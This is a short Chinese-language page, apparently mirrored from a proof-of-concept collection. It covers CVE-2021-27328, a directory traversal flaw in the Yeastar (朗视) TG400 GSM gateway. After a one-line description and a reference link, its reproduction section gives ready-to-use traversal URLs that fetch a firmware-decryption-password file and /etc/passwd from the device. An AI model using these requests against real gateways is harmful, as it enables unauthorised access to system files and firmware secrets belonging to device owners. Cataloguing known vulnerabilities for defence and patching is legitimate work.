mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 20:36:14 +00:00
27 lines
551 B
Markdown
27 lines
551 B
Markdown
# 朗视 TG400 GSM 网关目录遍历 CVE-2021-27328
|
||
|
||
## 漏洞描述
|
||
|
||
朗视 TG400 GSM 网关存在目录遍历 ,攻击者可以通过漏洞获取敏感信息
|
||
|
||
参考阅读:
|
||
|
||
- https://github.com/SQSamir/CVE-2021-27328
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
朗视 TG400 GSM 网关
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
暂无FOFA语句及固件设备复现
|
||
|
||
```plain
|
||
获取固件解密密码
|
||
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect
|
||
/etc/passwd:
|
||
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd
|
||
```
|